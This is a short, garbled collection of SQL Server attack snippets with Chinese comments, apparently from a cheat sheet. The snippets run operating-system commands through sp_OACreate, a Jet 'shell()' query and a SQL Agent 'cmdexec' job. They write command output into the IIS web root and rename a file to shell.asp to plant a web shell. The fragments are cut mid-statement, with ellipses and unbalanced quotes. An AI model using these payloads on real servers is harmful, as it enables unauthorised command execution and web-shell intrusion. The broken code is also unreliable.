@object, 'run', NULL, 'C:\Windows\System32\cmd.exe /c whoami >C:\inetpub\wwwroot\result.txt'
/* 执行命令并回显...whoami > C:\inetpub\wwwroot\result.txt','C:\Windows\System32','','1'
• 调用 ADODB.Stream 对象写文件
ProgID:ADODB.StreamCLSID...', @object OUTPUT
EXEC sp_OAMethod @object, 'MoveFile', NULL, 'C:\shell.txt','C:\inetpub\wwwroot\shell.asp...',
'select shell("C:\Windows\System32\cmd.exe /c whoami > C:\inetpub\wwwroot\result.txt")');
SQL Server...null,'JobName',null,'1','cmdexec','cmd.exe /c "whoami > C:\inetpub\wwwroot\result.txt"'
EXEC sp_add_jobserver